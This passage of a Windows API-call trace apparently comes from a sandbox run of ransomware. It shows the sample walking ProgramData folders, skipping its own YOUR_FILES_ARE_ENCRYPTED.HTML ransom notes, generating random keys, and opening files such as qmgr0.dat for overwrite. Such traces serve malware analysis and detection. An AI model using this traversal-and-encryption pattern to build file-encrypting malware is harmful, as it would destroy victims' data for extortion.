ftCreationTime.dwLowDateTime=0x2c774c50, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.900] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2c774c50, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.900] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2c774c50, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc4a680, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="BreadcrumbStore", cAlternateFileName="BREADC~1")) returned 1 [0169.900] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore") returned 61 [0169.900] GetProcessHeap () returned 0x270000 [0169.900] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.900] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore") returned="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\NetFramework\\BreadcrumbStore" [0169.900] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*" [0169.900] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2c774c50, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc4a680, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.900] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2c774c50, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc4a680, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.901] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbc4a680, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 
[0169.901] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0169.901] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.901] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbc4a680, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc4a680, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.901] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.901] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0169.901] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\netframework\\breadcrumbstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.901] GetProcessHeap () returned 0x270000 [0169.902] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.902] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbc707e0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc707e0, 
ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.902] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0169.902] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.902] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbc707e0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.902] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.902] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0169.902] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\NetFramework\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\netframework\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.902] GetProcessHeap () returned 0x270000 [0169.903] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.903] FindNextFileW (in: 
hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbc96940, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc96940, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Network", cAlternateFileName="")) returned 1 [0169.903] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network") returned 40 [0169.903] GetProcessHeap () returned 0x270000 [0169.903] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.903] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network" [0169.903] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\*" [0169.903] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f09cf6, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbc96940, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc96940, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.903] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f09cf6, 
ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbc96940, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc96940, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.904] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0169.904] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections") returned 52 [0169.904] GetProcessHeap () returned 0x270000 [0169.904] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.904] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections" [0169.904] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\*" [0169.904] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, 
ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.904] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.904] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbc707e0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.904] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 82 [0169.904] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.904] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbc707e0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, 
ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.904] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.904] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 82 [0169.904] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Connections\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\network\\connections\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.905] GetProcessHeap () returned 0x270000 [0169.905] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.905] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Downloader", cAlternateFileName="DOWNLO~1")) returned 1 [0169.905] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader") returned 51 [0169.905] GetProcessHeap () returned 0x270000 [0169.905] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.905] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\Network\\Downloader" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader" [0169.906] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*" [0169.906] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.906] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc707e0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.906] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x5c9fd775, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5c9fd775, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ca238d5, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x400000, dwReserved0=0x0, 
dwReserved1=0x60, cFileName="qmgr0.dat", cAlternateFileName="")) returned 1 [0169.906] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat") returned 61 [0169.906] lstrcmpW (lpString1="qmgr0.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.906] PathFindExtensionW (pszPath="qmgr0.dat") returned=".dat" [0169.906] lstrlenW (lpString=".dat") returned 4 [0169.906] PathFindExtensionW (pszPath="qmgr0.dat") returned=".dat" [0169.906] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0169.906] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr0.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.906] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x5ca238d5, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5ca238d5, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ca238d5, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x400000, dwReserved0=0x0, dwReserved1=0x60, cFileName="qmgr1.dat", cAlternateFileName="")) returned 1 [0169.906] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat") returned 61 [0169.906] lstrcmpW (lpString1="qmgr1.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.907] PathFindExtensionW (pszPath="qmgr1.dat") returned=".dat" [0169.907] lstrlenW (lpString=".dat") returned 4 [0169.907] PathFindExtensionW (pszPath="qmgr1.dat") 
returned=".dat" [0169.907] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0169.907] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr1.dat" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr1.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.907] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbc707e0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc96940, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.907] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0169.907] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.907] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbc707e0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc707e0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc96940, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.907] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 
[0169.907] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0169.907] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.907] GetProcessHeap () returned 0x270000 [0169.908] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.908] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbc96940, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc96940, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc96940, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.908] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.908] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbc96940, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbc96940, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbc96940, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.908] FindClose (in: 
